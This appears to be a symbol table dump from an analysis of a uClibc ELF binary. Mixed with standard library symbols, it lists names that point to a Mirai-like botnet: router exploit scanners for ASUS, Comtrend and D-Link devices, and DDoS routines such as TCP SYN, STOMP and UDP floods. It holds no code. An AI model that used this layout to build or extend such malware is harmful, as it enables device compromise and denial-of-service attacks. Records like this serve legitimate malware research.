                          __GI_fseeko64.symtab0x41b980316FUNC<unknown>HIDDEN2
                          __GI_fstat.symtab0x418e6c96FUNC<unknown>HIDDEN2
                          __GI_fwrite_unlocked.symtab0x41526c168FUNC<unknown>HIDDEN2
                          __GI_getc_unlocked.symtab0x41aac8216FUNC<unknown>HIDDEN2
                          __GI_getdtablesize.symtab0x418f7c52FUNC<unknown>HIDDEN2
                          __GI_getegid.symtab0x418fb018FUNC<unknown>HIDDEN2
                          __GI_geteuid.symtab0x418fc218FUNC<unknown>HIDDEN2
                          __GI_getgid.symtab0x418fd418FUNC<unknown>HIDDEN2
                          __GI_getpagesize.symtab0x418fe828FUNC<unknown>HIDDEN2
                          __GI_getpid.symtab0x417de452FUNC<unknown>HIDDEN2
                          __GI_getrlimit.symtab0x41900464FUNC<unknown>HIDDEN2
                          __GI_getsockname.symtab0x415df464FUNC<unknown>HIDDEN2
                          __GI_getuid.symtab0x41904418FUNC<unknown>HIDDEN2
                          __GI_inet_addr.symtab0x415c2044FUNC<unknown>HIDDEN2
                          __GI_inet_aton.symtab0x41b114200FUNC<unknown>HIDDEN2
                          __GI_initstate_r.symtab0x417474204FUNC<unknown>HIDDEN2
                          __GI_ioctl.symtab0x41b744268FUNC<unknown>HIDDEN2
                          __GI_isatty.symtab0x41b07c36FUNC<unknown>HIDDEN2
                          __GI_kill.symtab0x413ca860FUNC<unknown>HIDDEN2
                          __GI_listen.symtab0x415e7864FUNC<unknown>HIDDEN2
                          __GI_lseek64.symtab0x41be48108FUNC<unknown>HIDDEN2
                          __GI_memchr.symtab0x41ac8024FUNC<unknown>HIDDEN2
                          __GI_memcpy.symtab0x415480860FUNC<unknown>HIDDEN2
                          __GI_memmove.symtab0x4158c0188FUNC<unknown>HIDDEN2
                          __GI_mempcpy.symtab0x41bd8036FUNC<unknown>HIDDEN2
                          __GI_memrchr.symtab0x41aca0200FUNC<unknown>HIDDEN2
                          __GI_memset.symtab0x415820150FUNC<unknown>HIDDEN2
                          __GI_mmap.symtab0x418d2464FUNC<unknown>HIDDEN2
                          __GI_mremap.symtab0x41905868FUNC<unknown>HIDDEN2
                          __GI_munmap.symtab0x41909c60FUNC<unknown>HIDDEN2
                          __GI_nanosleep.symtab0x419118108FUNC<unknown>HIDDEN2
                          __GI_open.symtab0x4180c0172FUNC<unknown>HIDDEN2
                          __GI_opendir.symtab0x414104176FUNC<unknown>HIDDEN2
                          __GI_raise.symtab0x417e18116FUNC<unknown>HIDDEN2
                          __GI_random.symtab0x417194100FUNC<unknown>HIDDEN2
                          __GI_random_r.symtab0x41733c108FUNC<unknown>HIDDEN2
                          __GI_rawmemchr.symtab0x41bda4164FUNC<unknown>HIDDEN2
                          __GI_read.symtab0x4182c0172FUNC<unknown>HIDDEN2
                          __GI_readdir.symtab0x414254148FUNC<unknown>HIDDEN2
                          __GI_readdir64.symtab0x419280152FUNC<unknown>HIDDEN2
                          __GI_recv.symtab0x415ef8128FUNC<unknown>HIDDEN2
                          __GI_recvfrom.symtab0x415fbc144FUNC<unknown>HIDDEN2
                          __GI_remove.symtab0x41434c124FUNC<unknown>HIDDEN2
                          __GI_rmdir.symtab0x41918460FUNC<unknown>HIDDEN2
                          __GI_sbrk.symtab0x418d64104FUNC<unknown>HIDDEN2
                          __GI_select.symtab0x413d6c136FUNC<unknown>HIDDEN2
                          __GI_send.symtab0x41608c128FUNC<unknown>HIDDEN2
                          __GI_sendto.symtab0x416150144FUNC<unknown>HIDDEN2
                          __GI_setsid.symtab0x413df460FUNC<unknown>HIDDEN2
                          __GI_setsockopt.symtab0x4161e068FUNC<unknown>HIDDEN2
                          __GI_setstate_r.symtab0x417540228FUNC<unknown>HIDDEN2
                          __GI_sigaction.symtab0x41b1dc20FUNC<unknown>HIDDEN2
                          __GI_sigprocmask.symtab0x4191c0116FUNC<unknown>HIDDEN2
                          __GI_sleep.symtab0x417e8c224FUNC<unknown>HIDDEN2
                          __GI_socket.symtab0x41622464FUNC<unknown>HIDDEN2
                          __GI_sprintf.symtab0x4143c8132FUNC<unknown>HIDDEN2
                          __GI_srandom_r.symtab0x4173a8204FUNC<unknown>HIDDEN2
                          __GI_stat.symtab0x413e3096FUNC<unknown>HIDDEN2
                          __GI_strchr.symtab0x41ad68196FUNC<unknown>HIDDEN2
                          __GI_strchrnul.symtab0x41ae2c192FUNC<unknown>HIDDEN2
                          __GI_strcmp.symtab0x41aeec34FUNC<unknown>HIDDEN2
                          __GI_strcoll.symtab0x41aeec34FUNC<unknown>HIDDEN2
                          __GI_strcspn.symtab0x41af1072FUNC<unknown>HIDDEN2
                          __GI_strdup.symtab0x415bbc76FUNC<unknown>HIDDEN2
                          __GI_strlen.symtab0x41536088FUNC<unknown>HIDDEN2
                          __GI_strnlen.symtab0x41597c136FUNC<unknown>HIDDEN2
                          __GI_strpbrk.symtab0x41b05044FUNC<unknown>HIDDEN2
                          __GI_strrchr.symtab0x41af5880FUNC<unknown>HIDDEN2
                          __GI_strspn.symtab0x41afa848FUNC<unknown>HIDDEN2
                          __GI_strstr.symtab0x415a04182FUNC<unknown>HIDDEN2
                          __GI_strtok.symtab0x415c0824FUNC<unknown>HIDDEN2
                          __GI_strtok_r.symtab0x41afd8120FUNC<unknown>HIDDEN2
                          __GI_sysconf.symtab0x4177a01032FUNC<unknown>HIDDEN2
                          __GI_tcgetattr.symtab0x41b0a0116FUNC<unknown>HIDDEN2
                          __GI_time.symtab0x413e9016FUNC<unknown>HIDDEN2
                          __GI_times.symtab0x41923416FUNC<unknown>HIDDEN2
                          __GI_unlink.symtab0x41924460FUNC<unknown>HIDDEN2
                          __GI_vsnprintf.symtab0x41444c180FUNC<unknown>HIDDEN2
                          __GI_waitpid.symtab0x41b320172FUNC<unknown>HIDDEN2
                          __GI_wcrtomb.symtab0x41963868FUNC<unknown>HIDDEN2
                          __GI_wcsnrtombs.symtab0x41969c124FUNC<unknown>HIDDEN2
                          __GI_wcsrtombs.symtab0x41967c32FUNC<unknown>HIDDEN2
                          __GI_write.symtab0x4181c0172FUNC<unknown>HIDDEN2
                          __JCR_END__.symtab0x4301880OBJECT<unknown>DEFAULT9
                          __JCR_LIST__.symtab0x4301880OBJECT<unknown>DEFAULT9
                          __app_fini.symtab0x430dc04OBJECT<unknown>HIDDEN12
                          __atexit_lock.symtab0x43030024OBJECT<unknown>DEFAULT10
                          __bss_start.symtab0x4304280NOTYPE<unknown>DEFAULTSHN_ABS
                          __check_one_fd.symtab0x41854472FUNC<unknown>DEFAULT2
                          __close.symtab0x417fc0164FUNC<unknown>DEFAULT2
                          __close_nocancel.symtab0x417fd040FUNC<unknown>DEFAULT2
                          __ctype_b.symtab0x4303284OBJECT<unknown>DEFAULT10
                          __curbrk.symtab0x4333544OBJECT<unknown>HIDDEN12
                          __data_start.symtab0x43018c0NOTYPE<unknown>DEFAULT10
                          __deregister_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                          __do_global_ctors_aux.symtab0x41bf200FUNC<unknown>DEFAULT2
                          __do_global_dtors_aux.symtab0x4001000FUNC<unknown>DEFAULT2
                          __dso_handle.symtab0x43018c0OBJECT<unknown>HIDDEN10
                          __environ.symtab0x430db84OBJECT<unknown>DEFAULT12
                          __errno_location.symtab0x4142e844FUNC<unknown>DEFAULT2
                          __errno_location.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          __exit_cleanup.symtab0x4308684OBJECT<unknown>HIDDEN12
                          __fcntl_nocancel.symtab0x413a64180FUNC<unknown>DEFAULT2
                          __fgetc_unlocked.symtab0x41aac8216FUNC<unknown>DEFAULT2
                          __fini_array_end.symtab0x4301780NOTYPE<unknown>HIDDEN6
                          __fini_array_start.symtab0x4301780NOTYPE<unknown>HIDDEN6
                          __fork.symtab0x417ba8572FUNC<unknown>DEFAULT2
                          __fork_generation_pointer.symtab0x4337a04OBJECT<unknown>HIDDEN12
                          __fork_handlers.symtab0x4337a44OBJECT<unknown>HIDDEN12
                          __fork_lock.symtab0x43086c4OBJECT<unknown>HIDDEN12
                          __getdents.symtab0x418ecc176FUNC<unknown>HIDDEN2
                          __getdents64.symtab0x41b850276FUNC<unknown>HIDDEN2
                          __getpagesize.symtab0x418fe828FUNC<unknown>DEFAULT2
                          __getpid.symtab0x417de452FUNC<unknown>DEFAULT2
                          __glibc_strerror_r.symtab0x415abc32FUNC<unknown>DEFAULT2
                          __glibc_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          __h_errno_location.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                          __init_array_end.symtab0x4301780NOTYPE<unknown>HIDDEN6
                          __init_array_start.symtab0x4301780NOTYPE<unknown>HIDDEN6
                          __init_brk.symtab0x41b6b084FUNC<unknown>HIDDEN2
                          __init_brk.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          __libc_accept.symtab0x415c8c116FUNC<unknown>DEFAULT2
                          __libc_close.symtab0x417fc0164FUNC<unknown>DEFAULT2
                          __libc_connect.symtab0x415d80116FUNC<unknown>DEFAULT2
                          __libc_disable_asynccancel.symtab0x418380136FUNC<unknown>HIDDEN2
                          __libc_enable_asynccancel.symtab0x418408136FUNC<unknown>HIDDEN2
                          __libc_errno.symtab0x04TLS<unknown>HIDDEN6
                          __libc_fcntl.symtab0x413b18280FUNC<unknown>DEFAULT2
                          __libc_fork.symtab0x417ba8572FUNC<unknown>DEFAULT2
                          __libc_h_errno.symtab0x44TLS<unknown>HIDDEN6
                          __libc_nanosleep.symtab0x419118108FUNC<unknown>DEFAULT2
                          __libc_open.symtab0x4180c0172FUNC<unknown>DEFAULT2
                          __libc_read.symtab0x4182c0172FUNC<unknown>DEFAULT2
                          __libc_recv.symtab0x415ef8128FUNC<unknown>DEFAULT2
                          __libc_recvfrom.symtab0x415fbc144FUNC<unknown>DEFAULT2
                          __libc_select.symtab0x413d6c136FUNC<unknown>DEFAULT2
                          __libc_send.symtab0x41608c128FUNC<unknown>DEFAULT2
                          __libc_sendto.symtab0x416150144FUNC<unknown>DEFAULT2
                          __libc_setup_tls.symtab0x41b472366FUNC<unknown>DEFAULT2
                          __libc_sigaction.symtab0x41b1dc20FUNC<unknown>DEFAULT2
                          __libc_stack_end.symtab0x430db44OBJECT<unknown>DEFAULT12
                          __libc_system.symtab0x418cac120FUNC<unknown>DEFAULT2
                          __libc_waitpid.symtab0x41b320172FUNC<unknown>DEFAULT2
                          __libc_write.symtab0x4181c0172FUNC<unknown>DEFAULT2
                          __lll_lock_wait_private.symtab0x41b28064FUNC<unknown>HIDDEN2
                          __lll_unlock_wake_private.symtab0x41b2c030FUNC<unknown>HIDDEN2
                          __malloc_consolidate.symtab0x416dcc328FUNC<unknown>HIDDEN2
                          __malloc_largebin_index.symtab0x416264112FUNC<unknown>DEFAULT2
                          __malloc_lock.symtab0x43022424OBJECT<unknown>DEFAULT10
                          __malloc_state.symtab0x433428888OBJECT<unknown>DEFAULT12
                          __malloc_trim.symtab0x416d30156FUNC<unknown>DEFAULT2
                          __movmemSI12_i4.symtab0x41bf0014FUNC<unknown>HIDDEN2
                          __movmem_i4_even.symtab0x41bec848FUNC<unknown>HIDDEN2
                          __movmem_i4_odd.symtab0x41bece42FUNC<unknown>HIDDEN2
                          __movstrSI12_i4.symtab0x41bf0014FUNC<unknown>HIDDEN2
                          __movstr_i4_even.symtab0x41bec848FUNC<unknown>HIDDEN2
                          __movstr_i4_odd.symtab0x41bece42FUNC<unknown>HIDDEN2
                          __nptl_deallocate_tsd.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                          __nptl_nthreads.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                          __open.symtab0x4180c0172FUNC<unknown>DEFAULT2
                          __open_nocancel.symtab0x4180d040FUNC<unknown>DEFAULT2
                          __pagesize.symtab0x430dbc4OBJECT<unknown>DEFAULT12
                          __preinit_array_end.symtab0x4301780NOTYPE<unknown>HIDDEN6
                          __preinit_array_start.symtab0x4301780NOTYPE<unknown>HIDDEN6
                          __progname.symtab0x43031c4OBJECT<unknown>DEFAULT10
                          __progname_full.symtab0x4303204OBJECT<unknown>DEFAULT10
                          __pthread_initialize_minimal.symtab0x41b5e024FUNC<unknown>DEFAULT2
                          __pthread_mutex_init.symtab0x41849e14FUNC<unknown>DEFAULT2
                          __pthread_mutex_lock.symtab0x41849014FUNC<unknown>DEFAULT2
                          __pthread_mutex_trylock.symtab0x41849014FUNC<unknown>DEFAULT2
                          __pthread_mutex_unlock.symtab0x41849014FUNC<unknown>DEFAULT2
                          __pthread_return_0.symtab0x41849014FUNC<unknown>DEFAULT2
                          __pthread_unwind.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                          __read.symtab0x4182c0172FUNC<unknown>DEFAULT2
                          __read_nocancel.symtab0x4182d040FUNC<unknown>DEFAULT2
                          __register_frame_info.symtab0x00NOTYPE<unknown>DEFAULTSHN_UNDEF
                          __rtld_fini.symtab0x430dc44OBJECT<unknown>HIDDEN12
                          __sdivsi3_i4i.symtab0x413710852FUNC<unknown>HIDDEN2
                          __sigjmp_save.symtab0x41b1f056FUNC<unknown>HIDDEN2
                          __sigsetjmp.symtab0x418df060FUNC<unknown>DEFAULT2
                          __sigsetjmp_intern.symtab0x418df40NOTYPE<unknown>DEFAULT2
                          __stdin.symtab0x4303384OBJECT<unknown>DEFAULT10
                          __stdio_READ.symtab0x41babc80FUNC<unknown>HIDDEN2
                          __stdio_WRITE.symtab0x41bb0c192FUNC<unknown>HIDDEN2
                          __stdio_adjust_position.symtab0x41bbcc196FUNC<unknown>HIDDEN2
                          __stdio_fwrite.symtab0x419bc8264FUNC<unknown>HIDDEN2
                          __stdio_rfill.symtab0x41bc9048FUNC<unknown>HIDDEN2
                          __stdio_seek.symtab0x41bd4c52FUNC<unknown>HIDDEN2
                          __stdio_trans2r_o.symtab0x41bcc0140FUNC<unknown>HIDDEN2
                          __stdio_trans2w_o.symtab0x419e40196FUNC<unknown>HIDDEN2
                          __stdio_wcommit.symtab0x419f0452FUNC<unknown>HIDDEN2
                          __stdout.symtab0x43033c4OBJECT<unknown>DEFAULT10
                          __sys_accept.symtab0x415c4c64FUNC<unknown>DEFAULT2
                          __sys_connect.symtab0x415d4064FUNC<unknown>DEFAULT2
                          __sys_recv.symtab0x415eb864FUNC<unknown>DEFAULT2
                          __sys_recvfrom.symtab0x415f7868FUNC<unknown>DEFAULT2
                          __sys_send.symtab0x41604c64FUNC<unknown>DEFAULT2
                          __sys_sendto.symtab0x41610c68FUNC<unknown>DEFAULT2
                          __syscall_error.symtab0x4153200NOTYPE<unknown>DEFAULT2
                          __syscall_error.symtab0x4153c00NOTYPE<unknown>DEFAULT2
                          __syscall_error.symtab0x4157e00NOTYPE<unknown>DEFAULT2
                          __syscall_error.symtab0x417f800NOTYPE<unknown>DEFAULT2
                          __syscall_error.symtab0x4180800NOTYPE<unknown>DEFAULT2
                          __syscall_error.symtab0x4181800NOTYPE<unknown>DEFAULT2
                          __syscall_error.symtab0x4182800NOTYPE<unknown>DEFAULT2
                          __syscall_error.symtab0x41ac400NOTYPE<unknown>DEFAULT2
                          __syscall_error.symtab0x41b2400NOTYPE<unknown>DEFAULT2
                          __syscall_error.symtab0x41b2e00NOTYPE<unknown>DEFAULT2
                          __syscall_fcntl.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          __syscall_nanosleep.symtab0x4190d864FUNC<unknown>DEFAULT2
                          __syscall_rt_sigaction.symtab0x41b70464FUNC<unknown>DEFAULT2
                          __syscall_rt_sigaction.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          __syscall_select.symtab0x413d2868FUNC<unknown>DEFAULT2
                          __tls_get_addr.symtab0x41b45c22FUNC<unknown>DEFAULT2
                          __uClibc_fini.symtab0x4184d8108FUNC<unknown>DEFAULT2
                          __uClibc_init.symtab0x41858c68FUNC<unknown>DEFAULT2
                          __uClibc_main.symtab0x4185d0660FUNC<unknown>DEFAULT2
                          __uClibc_main.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          __uclibc_progname.symtab0x4303184OBJECT<unknown>HIDDEN10
                          __udivsi3_i4i.symtab0x413640208FUNC<unknown>HIDDEN2
                          __waitpid.symtab0x41b320172FUNC<unknown>DEFAULT2
                          __waitpid_nocancel.symtab0x41b33040FUNC<unknown>DEFAULT2
                          __write.symtab0x4181c0172FUNC<unknown>DEFAULT2
                          __write_nocancel.symtab0x4181d040FUNC<unknown>DEFAULT2
                          __xpg_strerror_r.symtab0x415adc224FUNC<unknown>DEFAULT2
                          __xpg_strerror_r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          __xstat32_conv.symtab0x413f2c128FUNC<unknown>HIDDEN2
                          __xstat64_conv.symtab0x413ea0140FUNC<unknown>HIDDEN2
                          _adjust_pos.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          _brk.symtab0x41b67460FUNC<unknown>HIDDEN2
                          _bss_custom_printf_spec.symtab0x43085410OBJECT<unknown>DEFAULT12
                          _charpad.symtab0x41450088FUNC<unknown>DEFAULT2
                          _cs_funcs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          _custom_printf_arginfo.symtab0x4333d840OBJECT<unknown>HIDDEN12
                          _custom_printf_handler.symtab0x43340040OBJECT<unknown>HIDDEN12
                          _custom_printf_spec.symtab0x4302204OBJECT<unknown>HIDDEN10
                          _dl_aux_init.symtab0x41b5f832FUNC<unknown>DEFAULT2
                          _dl_nothread_init_static_tls.symtab0x41b61892FUNC<unknown>HIDDEN2
                          _dl_phdr.symtab0x4337c84OBJECT<unknown>DEFAULT12
                          _dl_phnum.symtab0x4337cc4OBJECT<unknown>DEFAULT12
                          _dl_tls_dtv_gaps.symtab0x4337bc1OBJECT<unknown>DEFAULT12
                          _dl_tls_dtv_slotinfo_list.symtab0x4337b84OBJECT<unknown>DEFAULT12
                          _dl_tls_generation.symtab0x4337c04OBJECT<unknown>DEFAULT12
                          _dl_tls_max_dtv_idx.symtab0x4337b04OBJECT<unknown>DEFAULT12
                          _dl_tls_setup.symtab0x41b42060FUNC<unknown>DEFAULT2
                          _dl_tls_static_align.symtab0x4337ac4OBJECT<unknown>DEFAULT12
                          _dl_tls_static_nelem.symtab0x4337c44OBJECT<unknown>DEFAULT12
                          _dl_tls_static_size.symtab0x4337b44OBJECT<unknown>DEFAULT12
                          _dl_tls_static_used.symtab0x4337a84OBJECT<unknown>DEFAULT12
                          _edata.symtab0x4304280NOTYPE<unknown>DEFAULTSHN_ABS
                          _end.symtab0x4337d00NOTYPE<unknown>DEFAULTSHN_ABS
                          _exit.symtab0x413c30104FUNC<unknown>DEFAULT2
                          _exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          _fini.symtab0x41bf600FUNC<unknown>HIDDEN3
                          _fixed_buffers.symtab0x430e188192OBJECT<unknown>DEFAULT12
                          _fopen.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          _fp_out_narrow.symtab0x414558124FUNC<unknown>DEFAULT2
                          _fpmaxtostr.symtab0x41a0d01256FUNC<unknown>HIDDEN2
                          _fpmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          _fwrite.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          _init.symtab0x4000b40FUNC<unknown>HIDDEN1
                          _load_inttype.symtab0x419f3894FUNC<unknown>HIDDEN2
                          _load_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          _ppfs_init.symtab0x414b60124FUNC<unknown>HIDDEN2
                          _ppfs_init.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          _ppfs_parsespec.symtab0x414e281024FUNC<unknown>HIDDEN2
                          _ppfs_parsespec.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          _ppfs_prepargs.symtab0x414bdc72FUNC<unknown>HIDDEN2
                          _ppfs_prepargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          _ppfs_setargs.symtab0x414c24456FUNC<unknown>HIDDEN2
                          _ppfs_setargs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          _promoted_size.symtab0x414dec60FUNC<unknown>DEFAULT2
                          _pthread_cleanup_pop_restore.symtab0x4184bc28FUNC<unknown>DEFAULT2
                          _pthread_cleanup_push_defer.symtab0x4184ac16FUNC<unknown>DEFAULT2
                          _rfill.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          _setjmp.symtab0x418dd04FUNC<unknown>DEFAULT2
                          _start.symtab0x4001c030FUNC<unknown>DEFAULT2
                          _stdio.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          _stdio_fopen.symtab0x4198ec732FUNC<unknown>HIDDEN2
                          _stdio_init.symtab0x419cd0116FUNC<unknown>HIDDEN2
                          _stdio_openlist.symtab0x4303404OBJECT<unknown>DEFAULT10
                          _stdio_openlist_add_lock.symtab0x430df812OBJECT<unknown>DEFAULT12
                          _stdio_openlist_dec_use.symtab0x41a748380FUNC<unknown>HIDDEN2
                          _stdio_openlist_del_count.symtab0x430e144OBJECT<unknown>DEFAULT12
                          _stdio_openlist_del_lock.symtab0x430e0412OBJECT<unknown>DEFAULT12
                          _stdio_openlist_use_count.symtab0x430e104OBJECT<unknown>DEFAULT12
                          _stdio_streams.symtab0x430348204OBJECT<unknown>DEFAULT10
                          _stdio_term.symtab0x419d44252FUNC<unknown>HIDDEN2
                          _stdio_user_locking.symtab0x4303444OBJECT<unknown>DEFAULT10
                          _store_inttype.symtab0x419f9656FUNC<unknown>HIDDEN2
                          _store_inttype.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          _string_syserrmsgs.symtab0x41f1702906OBJECT<unknown>HIDDEN4
                          _string_syserrmsgs.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          _trans2r.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          _trans2w.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          _uintmaxtostr.symtab0x419fd0256FUNC<unknown>HIDDEN2
                          _uintmaxtostr.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          _vfprintf_internal.symtab0x4145d41420FUNC<unknown>HIDDEN2
                          _vfprintf_internal.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          _wcommit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          abort.symtab0x4170c8184FUNC<unknown>DEFAULT2
                          abort.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          accept.symtab0x415c8c116FUNC<unknown>DEFAULT2
                          accept.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          arch_names.symtab0x41d8a832OBJECT<unknown>DEFAULT4
                          asus.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          asus_fake_time.symtab0x4304744OBJECT<unknown>DEFAULT12
                          asus_init.symtab0x4002c02816FUNC<unknown>DEFAULT2
                          asus_rsck.symtab0x4304484OBJECT<unknown>DEFAULT12
                          asus_scanner_pid.symtab0x4304444OBJECT<unknown>DEFAULT12
                          asus_scanner_rawpkt.symtab0x43044c40OBJECT<unknown>DEFAULT12
                          asus_setup_connection.symtab0x400200188FUNC<unknown>DEFAULT2
                          attack.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          attack_get_opt_int.symtab0x401280136FUNC<unknown>DEFAULT2
                          attack_get_opt_ip.symtab0x4011e0136FUNC<unknown>DEFAULT2
                          attack_init.symtab0x401320624FUNC<unknown>DEFAULT2
                          attack_kill_all.symtab0x400ec0220FUNC<unknown>DEFAULT2
                          attack_method_nudp.symtab0x4046c01480FUNC<unknown>DEFAULT2
                          attack_method_stdhex.symtab0x404400704FUNC<unknown>DEFAULT2
                          attack_method_tcp.symtab0x401b601476FUNC<unknown>DEFAULT2
                          attack_ongoing.symtab0x43048032OBJECT<unknown>DEFAULT12
                          attack_parse.symtab0x400fa0552FUNC<unknown>DEFAULT2
                          attack_start.symtab0x400dc0228FUNC<unknown>DEFAULT2
                          attack_tcp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          attack_tcp_ack.symtab0x402e401544FUNC<unknown>DEFAULT2
                          attack_tcp_null.symtab0x403a601700FUNC<unknown>DEFAULT2
                          attack_tcp_sack2.symtab0x4021401508FUNC<unknown>DEFAULT2
                          attack_tcp_stomp.symtab0x4027401792FUNC<unknown>DEFAULT2
                          attack_tcp_syn.symtab0x4015a01464FUNC<unknown>DEFAULT2
                          attack_tcp_syndata.symtab0x4034601512FUNC<unknown>DEFAULT2
                          attack_udp.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          attack_udp_plain.symtab0x404140692FUNC<unknown>DEFAULT2
                          been_there_done_that.symtab0x4308644OBJECT<unknown>DEFAULT12
                          bind.symtab0x415d0064FUNC<unknown>DEFAULT2
                          bind.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          blink.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          calloc.symtab0x416998228FUNC<unknown>DEFAULT2
                          calloc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          cancel_handler.symtab0x418864240FUNC<unknown>DEFAULT2
                          checksum.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          checksum_generic.symtab0x4058a052FUNC<unknown>DEFAULT2
                          checksum_tcpudp.symtab0x4058e0140FUNC<unknown>DEFAULT2
                          clock.symtab0x41431456FUNC<unknown>DEFAULT2
                          clock.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          close.symtab0x417fc0164FUNC<unknown>DEFAULT2
                          closedir.symtab0x413fac200FUNC<unknown>DEFAULT2
                          closedir.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          completed.4720.symtab0x4304281OBJECT<unknown>DEFAULT12
                          comtrend.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          comtrend_fake_time.symtab0x4305084OBJECT<unknown>DEFAULT12
                          comtrend_init.symtab0x405a403108FUNC<unknown>DEFAULT2
                          comtrend_init_pid.symtab0x4304d84OBJECT<unknown>DEFAULT12
                          comtrend_init_rawpkt.symtab0x4304e040OBJECT<unknown>DEFAULT12
                          comtrend_range.symtab0x43019836OBJECT<unknown>DEFAULT10
                          comtrend_rsck.symtab0x4304dc4OBJECT<unknown>DEFAULT12
                          comtrend_setup_connection.symtab0x405980188FUNC<unknown>DEFAULT2
                          conn_table.symtab0x4304d44OBJECT<unknown>DEFAULT12
                          conn_table.symtab0x4306fc4OBJECT<unknown>DEFAULT12
                          conn_table.symtab0x4307ac4OBJECT<unknown>DEFAULT12
                          conn_table.symtab0x4307e44OBJECT<unknown>DEFAULT12
                          conn_table.symtab0x4308504OBJECT<unknown>DEFAULT12
                          conn_table.symtab0x4333584OBJECT<unknown>DEFAULT12
                          connect.symtab0x415d80116FUNC<unknown>DEFAULT2
                          connect.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          crti.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          crtn.S.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          crtstuff.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          dl-support.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          dlink.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          dlink_init.symtab0x4067402816FUNC<unknown>DEFAULT2
                          dlinkscanner_fake_time.symtab0x43053c4OBJECT<unknown>DEFAULT12
                          dlinkscanner_rsck.symtab0x4305104OBJECT<unknown>DEFAULT12
                          dlinkscanner_scanner_pid.symtab0x43050c4OBJECT<unknown>DEFAULT12
                          dlinkscanner_scanner_rawpkt.symtab0x43051440OBJECT<unknown>DEFAULT12
                          dlinkscanner_setup_connection.symtab0x406680188FUNC<unknown>DEFAULT2
                          do_system.symtab0x418954856FUNC<unknown>DEFAULT2
                          entries.symtab0x4333884OBJECT<unknown>DEFAULT12
                          environ.symtab0x430db84OBJECT<unknown>DEFAULT12
                          errno.symtab0x04TLS<unknown>DEFAULT6
                          errno.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          execve.symtab0x418e3060FUNC<unknown>DEFAULT2
                          execve.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          exit.symtab0x417624116FUNC<unknown>DEFAULT2
                          exit.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          exp10_table.symtab0x4200b472OBJECT<unknown>DEFAULT4
                          fclose.symtab0x419718444FUNC<unknown>DEFAULT2
                          fclose.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          fcntl.symtab0x413b18280FUNC<unknown>DEFAULT2
                          fd_ctrl.symtab0x4301ec4OBJECT<unknown>DEFAULT10
                          fd_serv.symtab0x4301f04OBJECT<unknown>DEFAULT10
                          fd_to_DIR.symtab0x414074144FUNC<unknown>DEFAULT2
                          fdopendir.symtab0x4141b4160FUNC<unknown>DEFAULT2
                          fflush_unlocked.symtab0x41a8c4516FUNC<unknown>DEFAULT2
                          fflush_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          fgetc.symtab0x41a5b8212FUNC<unknown>DEFAULT2
                          fgetc.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          fgetc_unlocked.symtab0x41aac8216FUNC<unknown>DEFAULT2
                          fgetc_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          fgets.symtab0x41a68c188FUNC<unknown>DEFAULT2
                          fgets.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
                          fgets_unlocked.symtab0x41aba0132FUNC<unknown>DEFAULT2
                          fgets_unlocked.c.symtab0x00FILE<unknown>DEFAULTSHN_ABS
